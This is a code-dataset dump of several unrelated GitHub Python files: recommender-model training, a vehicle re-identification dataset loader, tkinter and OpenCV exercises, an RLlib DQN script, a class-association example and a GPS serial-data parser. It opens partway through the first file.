10\n#cc_DIN_One_s = []\n#\n#for block in range(1, block_size+1):\n# cc_train_sample_temp = [[i[block_num*(block-1):block_num*block] for i in cc_train_sample[0]], cc_train_sample[1][block_num*(block-1):block_num*block]]\n#\n# if block == 1:\n# ccDIN_s = ccDINModelwithOneHist(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n# android_app_num, ios_app_num, mobile_model_num, \n# android_app_list, ios_app_list, mobile_model_list,\n# gametype_label_num, gametype_label_list, use_Activa='Sigmoid')\n# \n# ccDIN_res_s = ccDIN_s.train_model(cc_train_sample_temp, cc_eval_sample, batch_size, epoch, record_num)\n# cc_DIN_One_s.append(ccDIN_res_s)\n# else:\n# ccDIN_res_s = ccDIN_s.train_model(cc_train_sample_temp, cc_eval_sample, batch_size, epoch, record_num)\n# cc_DIN_One_s.append(ccDIN_res_s)\n\n#val_all = []\n#for res in cc_DIN_One_s:\n# val_all.extend(res.auc_val )\n# \n#import matplotlib.pylab as plt\n#plt.plot(list(range(len(val_all))), val_all)\n#plt.show()\n'''\n\n#GBDT + LR\ndef generate_array(raw_list, l):\n \n res = [0] * (l+2)\n for i in raw_list:\n if i == 0:\n break\n res[i] = 1\n \n return res\n \nhotrank_aid_list_array = np.array(hotrank_aid_list, dtype='int32').reshape(-1, 1)\nhotrank_uid_list_array = np.array(hotrank_uid_list, dtype='int32').reshape(-1, 1)\ngt_array = np.array(gametype_list, dtype='int32').reshape(-1, 1)\ngtl_array = np.array([generate_array(gametype_label_list[i], gametype_label_num) for i in gametype_list], dtype='int32').reshape(-1, gametype_label_num+2)\nhist_array = np.array([generate_array(i, gametype_num) for i in hist_list], dtype='int32').reshape(-1, gametype_num+2)\nandroid_hist_array = np.array([generate_array(i, android_app_num) for i in android_hist_list], dtype='int32').reshape(-1, android_app_num+2)\nios_hist_array = np.array([generate_array(i, ios_app_num) for i in ios_hist_list], dtype='int32').reshape(-1, ios_app_num+2)\nmobile_hist_array = np.array([generate_array(i, mobile_model_num) for i in mobile_hist_list], dtype='int32').reshape(-1, mobile_model_num+2)\ngl_train = np.concatenate((hotrank_aid_list_array, hotrank_uid_list_array, gt_array, gtl_array, hist_array, android_hist_array, ios_hist_array, mobile_hist_array), axis=-1)\n\nhotrank_aid_list_array_eval = np.array(hotrank_aid_list_in, dtype='int32').reshape(-1, 1)\nhotrank_uid_list_array_eval = np.array(hotrank_uid_list_in, dtype='int32').reshape(-1, 
1)\ngt_array_eval = np.array(gametype_list_in, dtype='int32').reshape(-1, 1)\ngtl_array_eval = np.array([generate_array(gametype_label_list_in[i], gametype_label_num) for i in gametype_list_in], dtype='int32').reshape(-1, gametype_label_num+2)\nhist_array_eval = np.array([generate_array(i, gametype_num) for i in hist_list_in], dtype='int32').reshape(-1, gametype_num+2)\nandroid_hist_list_in = [android_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nandroid_hist_array_eval = np.array([generate_array(i, android_app_num) for i in android_hist_list_in], dtype='int32').reshape(-1, android_app_num+2)\nios_hist_list_in = [ios_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nios_hist_array_eval = np.array([generate_array(i, ios_app_num) for i in ios_hist_list_in], dtype='int32').reshape(-1, ios_app_num+2)\nmobile_hist_list_in = [mobile_model_list_in[sn_dict_in[i]] for i in data_in['sn']]\nmobile_hist_array_eval = np.array([generate_array(i, mobile_model_num) for i in mobile_hist_list_in], dtype='int32').reshape(-1, mobile_model_num+2)\ngl_eval = np.concatenate((hotrank_aid_list_array_eval, hotrank_uid_list_array_eval, gt_array_eval, gtl_array_eval, hist_array_eval, android_hist_array_eval, ios_hist_array_eval, mobile_hist_array_eval), axis=-1)\n\nname = [str(i) for i in range(gl_train.shape[1])]\n\nlgb_train = lgb.Dataset(gl_train, label)\nlgb_eval = lgb.Dataset(gl_eval, label_eval, reference=lgb_train)\n\nparams = {\n 'task': 'train',\n 'boosting_type': 'gbdt',\n 'objective': 'binary',\n 'metric': {'binary_logloss'},\n 'num_leaves': 6,\n 'num_trees': 200,\n 'learning_rate': 0.01,\n 'feature_fraction': 0.9,\n 'bagging_fraction': 0.8,\n 'bagging_freq': 5,\n 'verbose': 0\n}\n\n# number of leaves, will be used in feature transformation\nnum_leaf = 6\n\nprint('Start training...')\n# train\ngbm = lgb.train(params,\n lgb_train,\n num_boost_round=100,\n valid_sets=lgb_train,\n feature_name=name,\n categorical_feature=name)\n\n#print('Save model...')\n## save model to file\n#gbm.save_model('model.txt')\n\nprint('Start predicting...')\n# predict and get data on leaves, training data\ny_pred = gbm.predict(gl_train, pred_leaf=True)\n\nprint(np.array(y_pred).shape)\nprint(y_pred[:10])\n\nprint('Writing transformed training data')\ntransformed_training_matrix = np.zeros([len(y_pred), len(y_pred[0]) * num_leaf], \\\n dtype=np.int64) # N * num_trees * num_leaves\nfor i in range(0, len(y_pred)):\n temp = np.arange(len(y_pred[0])) * num_leaf + np.array(y_pred[i])\n transformed_training_matrix[i][temp] += 1\n\n\ny_pred = gbm.predict(gl_eval, pred_leaf=True)\nprint('Writing transformed testing data')\ntransformed_testing_matrix = np.zeros([len(y_pred), len(y_pred[0]) * num_leaf], dtype=np.int64)\nfor i in range(0, len(y_pred)):\n temp = np.arange(len(y_pred[0])) * num_leaf + np.array(y_pred[i])\n transformed_testing_matrix[i][temp] += 1\n\n\nlm = LogisticRegression(penalty='l2', C=0.05) # logistic model construction\nlm.fit(transformed_training_matrix, label) # fitting the data\ny_pred_test = lm.predict_proba(transformed_testing_matrix) # Give the probability of each label\n\neval_auc = roc_auc_score(label_eval, y_pred_test[:, 1]) # roc_auc_score needs the positive-class column, not the full (N, 2) proba array\nprint(eval_auc)\n\ntemp, batch_size, epoch, record_num, save_path = [], 64, 3, 1000, 'D:\\\\my\\\\netease_data\\\\model'\nos.chdir(save_path)\n\nccbase = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, 
user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\nccbase_res = ccbase.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\nccbase.model.save('base_model.h5')\n\nccbase_tr = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\nccbase_tr_res = ccbase_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccbase_tr.model.save('basetr_model.h5')\n\nccdin = ccDINModelwithOneHist(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\nccdin_res = ccdin.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\nccdin.model.save('din_model.h5')\n\nccdin_tr = ccDINModelwithOneHist(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\nccdin_tr_res = ccdin_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccdin_tr.model.save('dintr_model.h5')\n\nccpnn = ccPNN(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\nccpnn_res = ccpnn.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\nccpnn.model.save('pnn_model.h5')\n\nccpnn_tr = ccPNN(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len, weighted=True, use_Transformer=True, w=1e-12)\nccpnn_tr_res = ccpnn_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccpnn_tr.model.save('pnntr_model.h5')\n\nccdeepfm = ccdeepFM(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, 
item_multi_cate_len=gametype_label_len)\nccdeepfm_res = ccdeepfm.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\nccdeepfm.model.save('deepfm_model.h5')\n\nccdeepfm_tr = ccdeepFM(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\nccdeepfm_tr_res = ccdeepfm_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccdeepfm_tr.model.save('deepfmtr_model.h5')\n\nstart, end, model = 1, 6, 'base'\nfor i in range(start, end):\n print('#'*50)\n print(i)\n print('#'*50)\n\n K.clear_session()\n ccbase = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\n ccbase_res = ccbase.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\n# np.savetxt(model + '_auc_' + str(i) + '.txt', ccbase_res.auc_val)\n \n K.clear_session()\n ccbase_tr = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\n ccbase_tr_res = ccbase_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\n# np.savetxt(model + 'tr_auc_' + str(i) + '.txt', ccbase_tr_res.auc_val)\n\n\ndraw(temp, train_num, batch_size, record_num, 'ReLU', 1, ['deepfm', 'base', 'base_tr', 'din', 'din_tr', 'pnn']) \n\n\ntemp1_mean, temp2_mean = 0, 0\nfor i in range(start, end):\n temp1 = np.loadtxt(model + '_auc_' + str(i) + '.txt')\n temp2 = np.loadtxt(model + 'tr_auc_' + str(i) + '.txt')\n temp1_mean = temp1_mean + temp1\n temp2_mean = temp2_mean + temp2\n\ntemp1_mean = temp1_mean / (end - start)\ntemp2_mean = temp2_mean / (end - start)\n\nx_index = (np.arange(len(temp1_mean))+1) / (train_num // batch_size // record_num)\nplt.plot(x_index, temp1_mean, label=model)\nplt.plot(x_index, temp2_mean, label=model+'_tr')\nplt.xlabel('epochs')\nplt.ylabel('auc')\nplt.legend()\nplt.title('The training process')\n\n\n\n\n\n","repo_name":"AcerLai/MyRS","sub_path":"lhj-master/深度推荐模型:din模型/code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":29076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
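The GBDT + LR block in train.py above hinges on one trick: each sample's per-tree leaf index is one-hot encoded into a wide feature vector that feeds the logistic regression. A minimal self-contained sketch of that transform, with synthetic data standing in for the original gl_train/label arrays (the toy X, y and the 20-round booster are illustrative assumptions, not values from the original run):

import numpy as np
import lightgbm as lgb
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(0)
X = rng.normal(size=(500, 10))
y = (X[:, 0] + rng.normal(scale=0.5, size=500) > 0).astype(int)

num_leaf = 6
gbm = lgb.train({'objective': 'binary', 'num_leaves': num_leaf, 'verbose': -1},
                lgb.Dataset(X, y), num_boost_round=20)

# pred_leaf=True returns, per sample, the leaf index reached in each tree
leaves = gbm.predict(X, pred_leaf=True)  # shape: (n_samples, n_trees)

# one-hot encode (tree, leaf) pairs: column = tree_idx * num_leaf + leaf_idx
onehot = np.zeros((leaves.shape[0], leaves.shape[1] * num_leaf), dtype=np.int64)
rows = np.repeat(np.arange(leaves.shape[0]), leaves.shape[1])
cols = (np.arange(leaves.shape[1]) * num_leaf + leaves).ravel()
onehot[rows, cols] = 1

lr = LogisticRegression(penalty='l2', C=0.05).fit(onehot, y)
print(lr.predict_proba(onehot)[:, 1][:5])

The column index tree_idx * num_leaf + leaf_idx mirrors the transformed_training_matrix loop in the original, just vectorized.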
+{"seq_id":"8782963574","text":"# encoding: utf-8\r\n\"\"\"\r\n@author: sherlock\r\n@contact: sherlockliao01@gmail.com\r\n\"\"\"\r\n\r\nimport glob\r\nimport re\r\nimport pdb\r\nimport os\r\nimport os.path as osp\r\nimport numpy as np\r\nfrom .bases import BaseImageDataset\r\n\r\n\r\nclass VERI_MM(BaseImageDataset):\r\n \"\"\"\r\n Market1501\r\n Reference:\r\n Zheng et al. Scalable Person Re-identification: A Benchmark. ICCV 2015.\r\n URL: http://www.liangzheng.org/Project/project_reid.html\r\n\r\n Dataset statistics:\r\n # identities: 1501 (+1 for background)\r\n # images: 12936 (train) + 3368 (query) + 15913 (gallery)\r\n \"\"\"\r\n dataset_dir = 'image_gan'\r\n\r\n def __init__(self, root='/home/haoluo/data', verbose=True, **kwargs):\r\n super(VERI_MM, self).__init__()\r\n root = r\"F:\\datasets\\VeRi776_multimodal\"\r\n self.dataset_dir = osp.join(root, self.dataset_dir)\r\n self.train_dir = osp.join(self.dataset_dir, 'image_train')\r\n self.query_dir = osp.join(self.dataset_dir, 'image_query')\r\n self.gallery_dir = osp.join(self.dataset_dir, 'image_test')\r\n\r\n self._check_before_run()\r\n\r\n train = self._process_dir(self.train_dir, relabel=True)\r\n query = self._process_dir(self.query_dir, relabel=False)\r\n gallery = self._process_dir(self.gallery_dir, relabel=False)\r\n #pdb.set_trace()\r\n if verbose:\r\n print(\"=> RGB_IR loaded\")\r\n self.print_dataset_statistics(train, query, gallery)\r\n\r\n self.train = train\r\n self.query = query\r\n self.gallery = gallery\r\n\r\n self.num_train_pids, self.num_train_imgs, self.num_train_cams = self.get_imagedata_info(self.train)\r\n self.num_query_pids, self.num_query_imgs, self.num_query_cams = self.get_imagedata_info(self.query)\r\n self.num_gallery_pids, self.num_gallery_imgs, self.num_gallery_cams = self.get_imagedata_info(self.gallery)\r\n\r\n print(\"veri776 multimodal version used as dataset! 
=> {}\".format(self.dataset_dir))\r\n #pdb.set_trace()\r\n\r\n def _check_before_run(self):\r\n \"\"\"Check if all files are available before going deeper\"\"\"\r\n if not osp.exists(self.dataset_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.dataset_dir))\r\n if not osp.exists(self.train_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.train_dir))\r\n if not osp.exists(self.query_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.query_dir))\r\n if not osp.exists(self.gallery_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.gallery_dir))\r\n\r\n def _process_dir(self, dir_path, relabel=False):\r\n imgs = glob.glob(osp.join(dir_path, '*.jpg'))\r\n pattern = re.compile(r'([-\\d]+)_c([-\\d]+)')\r\n\r\n pid_container = set()\r\n for img in imgs:\r\n pid, _ = map(int, pattern.search(img).groups())\r\n if pid == -1: continue # junk images are just ignored\r\n pid_container.add(pid)\r\n pid2label = {pid: label for label, pid in enumerate(pid_container)}\r\n\r\n dataset = []\r\n for img in imgs:\r\n pid, camid = map(int, pattern.search(img).groups())\r\n #pdb.set_trace()\r\n #if pid == -1: continue # junk images are just ignored\r\n assert 1 <= pid <= 776 # pid == 0 means background\r\n assert 1 <= camid <= 20\r\n camid -= 1 # index starts from 0\r\n if relabel: pid = pid2label[pid]\r\n\r\n r_path = osp.join(dir_path, img)\r\n n_path = osp.join(dir_path+\"_n\", img)\r\n t_path = osp.join(dir_path+\"_t\", img)\r\n\r\n dataset.append(((r_path, n_path, t_path), pid, 0, camid))\r\n return dataset\r\n\r\n","repo_name":"superlollipop123/Cross-directional-Center-Network-and-MSVR310","sub_path":"data/datasets/veri_mm.py","file_name":"veri_mm.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
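For reference, a small standalone sketch of the filename convention _process_dir depends on: pid and camera id are parsed out of VeRi-style names and the pids are remapped to contiguous training labels. The sample filenames below are made up for illustration:

import re

pattern = re.compile(r'([-\d]+)_c([-\d]+)')

# hypothetical VeRi-style filenames: <pid>_c<camid>_<frame>.jpg
names = ['0001_c002_00030600.jpg', '0776_c020_00084000.jpg']

pid_container = sorted({int(pattern.search(n).group(1)) for n in names})
pid2label = {pid: label for label, pid in enumerate(pid_container)}  # relabel to 0..N-1

for n in names:
    pid, camid = map(int, pattern.search(n).groups())
    print(n, '-> pid', pid2label[pid], 'camid', camid - 1)  # camid shifted to start at 0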
+{"seq_id":"27028892129","text":"from tkinter import *\n\nroot = Tk()\n\ncanvas = Canvas(root, width='300', height='300')\ncanvas.pack()\n\n# create a square drawing function that takes 2 parameters:\n# the square size, and the fill color,\n# and draws a square of that size and color to the center of the canvas.\n# create a loop that fills the canvas with rainbow colored squares.\n\nsquare_1 = 20\nsquare_1_color = 'green'\n\nsquare_2 = 50\nsquare_2_color = 'purple'\n\nsquare_3 = 100\nsquare_3_color = 'blue'\n\ndef center_square(x,y):\n square = canvas.create_rectangle (150 - (x/2), 150 - (x/2), 150 + (x/2), 150 + (x/2), fill=y)\n\ncenter_square(square_3, square_3_color)\ncenter_square(square_2, square_2_color)\ncenter_square(square_1, square_1_color)\n\nroot.mainloop()\n","repo_name":"green-fox-academy/AHolcsik","sub_path":"Week03/Day3/rainbow_box_function.py","file_name":"rainbow_box_function.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"15132377800","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 5 22:09:48 2017\n\n@author: zhangzhexi\n\"\"\"\n\nimport cv2\n\ndef main():\n image = cv2.imread(\"Test_images/Lenna.png\",1)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n cv2.imshow('Input Image',gray)\n cv2.imwrite('Input_image.jpg',gray)\n \n threshold_value = 128\n dst,thresh = cv2.threshold(gray, threshold_value, 255, cv2.THRESH_TRUNC)\n cv2.imshow(\"Threshold Image\", thresh)\n cv2.imwrite(\"Threshold_image.jpg\",thresh)\n\n# Binary Threshold\n dst,thresh_binary = cv2.threshold(gray, threshold_value, 255, cv2.THRESH_BINARY)\n cv2.imshow(\"Binary threshold\", thresh_binary)\n cv2.imwrite(\"Threshold_binary.jpg\", thresh_binary)\n\n# Band Thresholding\n threshold1 = 27\n threshold2 = 125\n dst,binary_image_1 = cv2.threshold(gray, threshold1, 255, cv2.THRESH_BINARY)\n dst,binary_image_2 = cv2.threshold(gray, threshold2, 255, cv2.THRESH_BINARY_INV)\n band_thresholded_image = cv2.bitwise_and(binary_image_1,binary_image_2)\n cv2.imshow(\"Band Thresholding\", band_thresholded_image)\n cv2.imwrite(\"Band_Thresholding.jpg\", band_thresholded_image)\n\n# Semi Thresholding\n current_threshold = 128\n max_threshold = 255;\n dst,semi_thresholded_image = cv2.threshold(gray,current_threshold,max_threshold,cv2.THRESH_BINARY_INV|cv2.THRESH_OTSU)\n semi_thresholded_image = cv2.bitwise_and(gray,semi_thresholded_image)\n cv2.imshow(\"Semi Thresholding\",semi_thresholded_image)\n cv2.imwrite(\"Semi_Thresholding.jpg\",semi_thresholded_image)\n\n# Adaptive Thresholding\n adaptive_thresh = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,101,10)\n cv2.imshow(\"Adaptive Thresholding\", adaptive_thresh)\n cv2.imwrite(\"Adaptive_Thresholding.jpg\", adaptive_thresh)\n \n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main()\n","repo_name":"zzx0921/EC601_OpenCV","sub_path":"Exercise4/Threshold.py","file_name":"Threshold.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"34741969477","text":"import pyvirtualdisplay\r\n_display = pyvirtualdisplay.Display(visible=False, size=(1400, 900))\r\n_ = _display.start()\r\nimport gym\r\nfrom gym.utils.play import play\r\nenv = gym.make(\"CartPole-v0\")\r\nplay(env, zoom=4)\r\nimport ray\r\nfrom ray import tune\r\nfrom ray.rllib.agents.dqn import DQNTrainer\r\n\r\nray.shutdown()\r\nray.init(\r\n include_webui=False,\r\n ignore_reinit_error=True,\r\n object_store_memory=8 * 1024 * 1024 * 1024 # 8GB limit … feel free to increase this if you can\r\n)\r\n\r\nENV = 'Humanoid-v1'\r\nTARGET_REWARD = 195\r\nTRAINER = DQNTrainer\r\n\r\ntune.run(\r\n TRAINER,\r\n stop={\"episode_reward_mean\": TARGET_REWARD}, # stop as soon as we \"solve\" the environment\r\n config={\r\n \"env\": ENV,\r\n \"num_workers\": 0, # run in a single process\r\n \"num_gpus\": 0,\r\n \"monitor\": True, # store stats and videos periodically\r\n \"evaluation_num_episodes\": 25, # every 25 episodes instead of the default 10\r\n }\r\n)\r\nfrom base64 import b64encode\r\nfrom pathlib import Path\r\nfrom typing import List\r\n\r\n# this will depend on which provider you are using; the correct version is\r\n# probably what you get if you append /ray/results/ to the output from !pwd\r\nOUT_PATH = Path('/root/ray_results/')\r\n\r\ndef latest_experiment() -> Path:\r\n \"\"\" Get the path of the results directory of the most recent training run. \"\"\"\r\n experiment_dirs = []\r\n for algorithm in OUT_PATH.iterdir():\r\n if not algorithm.is_dir():\r\n continue\r\n for experiment in algorithm.iterdir():\r\n if not experiment.is_dir():\r\n continue\r\n experiment_dirs.append((experiment.stat().st_mtime, experiment))\r\n return max(experiment_dirs)[1]\r\n\r\ndef latest_videos() -> List[Path]:\r\n # because the ISO timestamp is in the name, the last alphabetically is the latest\r\n return list(sorted(latest_experiment().glob('*.mp4')))\r\n\r\ndef render_mp4(videopath: Path) -> str:\r\n mp4 = open(videopath, 'rb').read()\r\n base64_encoded_mp4 = b64encode(mp4).decode()\r\n return f'{videopath.name}
'\r\n\r\n\r\nfrom IPython.display import HTML\r\nhtml = render_mp4(latest_videos()[-1])\r\nHTML(html)","repo_name":"shivamkainth/rescience","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
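One caveat on the RLlib script: DQN only works with discrete action spaces, which is why a CartPole-style environment fits here while a continuous-control task such as Humanoid would not. A quick sanity check one might run before tune.run, written against the classic gym API the script already imports:

import gym
from gym.spaces import Discrete

env = gym.make('CartPole-v0')
assert isinstance(env.action_space, Discrete), 'DQN needs a discrete action space'
print(env.action_space, env.observation_space)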
+{"seq_id":"26768411180","text":"'''Association example\n--Create a class Hardware with tow attributes 'name','installed_date'\nand add a method show_hardware which will show name and date\n\n--Create a class software with three attribute 'software_name','version','installed_date'\nand a method SHOW_Software which will show name,version and date\n\n--Create a class Computer with few attributes like 'name,'manufacture','location 'etc\nand two attributes one for hardware and one for software\n(list Type) and 5 function, for setting hardware,software,showing list of hardware,list of software and\nDisplay full specifications of the computer\n'''\n\n\nclass Hardware:\n\n def __init__(self):\n\n self.name = ''\n self.installed_date = ''\n self.list_of_hardware = []\n\n def show_hardware(self,name,installed_date):\n\n self.list_of_hardware.append(name)\n self.list_of_hardware.append(installed_date)\n\n\nclass Software:\n\n def __init__(self):\n\n self.software_name = ''\n self.version = 0\n self.installed_date = ''\n self.list_of_software=[]\n\n def show_software(self,software_name,version,installed_date):\n\n self.list_of_software.append(software_name)\n self.list_of_software.append(version)\n self.list_of_software.append(installed_date)\n\n\nclass Computer:\n\n def __init__(self,name,manufacturer,location):\n\n self.name = name\n self.manufacturer = manufacturer\n self.location = location\n self.clasHadw = Hardware()\n self.clasSoft = Software()\n\n def setting_hardware(self):\n\n print('Setting Hardware',self.clasHadw.list_of_hardware)\n print()\n\n def setting_software(self):\n\n print('Setting Software',self.clasSoft.list_of_software)\n print()\n\n def list_of_hardware(self):\n\n print('List Of Hardware: ')\n\n for hadw_list in self.clasHadw.list_of_hardware:\n print(hadw_list)\n print()\n\n def list_of_software(self):\n\n print('List of Software: ')\n\n for soft_list in self.clasSoft.list_of_software:\n print(soft_list)\n print()\n\n def show_full_specification(self):\n\n print(self.name,self.manufacturer,self.location,'contains:')\n print(self.clasHadw.list_of_hardware)\n print(self.clasSoft.list_of_software)\n\n\n\ncomp = Computer('Usman-PC','DEll','Karachi')\n\ncomp.clasHadw.show_hardware('Lan Card','Feb 5')\ncomp.clasHadw.show_hardware('Graphic Card','Jan 18')\ncomp.clasHadw.show_hardware('DVD Rom','March 18')\n\ncomp.setting_hardware()\ncomp.list_of_hardware()\n\ncomp.clasSoft.show_software('Pycharm',2.4,'Dec 2')\ncomp.clasSoft.show_software('MS office',2016,'Aril 19')\n\ncomp.setting_software()\ncomp.list_of_software()\n\ncomp.show_full_specification()","repo_name":"Mohammed-Usman/PythonCrashCourseTasks","sub_path":"association.py","file_name":"association.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27211917034","text":"#Written by Karan Jagdale, Undergraduate, IIT Bombay. \nimport serial\nimport io\nser=serial.Serial('/dev/ttyACM0',19200)\n\n\ndef bintodec(k,l):\n\tdecimal = 0\n\tbinary = []\n\tfor i in range(4):\n\t\tnzeros = 10 - len((k[l-i]))\n\t\tprint(nzeros)\n\t\tfor j in range(nzeros):\n\t\t\tbinary.append(0)\n\t\tfor j in range(len(k[l-i])-2):\n\t\t\t\tbinary.append(int((k[l-i][j+2]))) #Not appending initial 0b\n\tprint(binary)\n\tif(binary[0]==1):\n\t\tfor i in range(len(binary)):\n\t\t\tif(binary[i] == 1):\n\t\t\t\tbinary[i] = 0\n\t\t\telse:\n\t\t\t\tbinary[i] = 1\n\t\t\tdecimal = decimal + int(binary[i])*pow(2,(len(binary)-(i+1)))\n\t\treturn -(decimal+1)\n\t\n\telse:\n\t\tfor i in range(len(binary)):\n\t\t\tdecimal = decimal + int(binary[i])*pow(2,(len(binary)-(i+1)))\n\t\t\n\t\treturn decimal\n\t\t\n\n \ndef main():\n\ts = ser.read(26)\n\t#for i in s:\n\ts1 = map(bin,bytearray(s))\n\tN = bintodec(s1,17)\n\tE = bintodec(s1,21)\n\tD = bintodec(s1,25)\n\tprint(s1)\n\tprint(N,E,D)\nmain()\n\n\n\n\n\n\n\n#print(' '.join(format(ord(x), 'b') for x in s))\n#ser = io.BytesIO(b\"some initial binary data: \\x00\\x01\")\n#print(ser[0])\n#print(ord(s))\n#print(toBinary(s))\t#print((s1))\n\t#print(type(s1[0]))\n\t#print((s1[0][1]),int((s1[0][2])),(s1[0][3]))\nser.close()\n","repo_name":"KaranJagdale/Inertial-Snensors-Implementation","sub_path":"GPSDataLogging.py","file_name":"GPSDataLogging.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
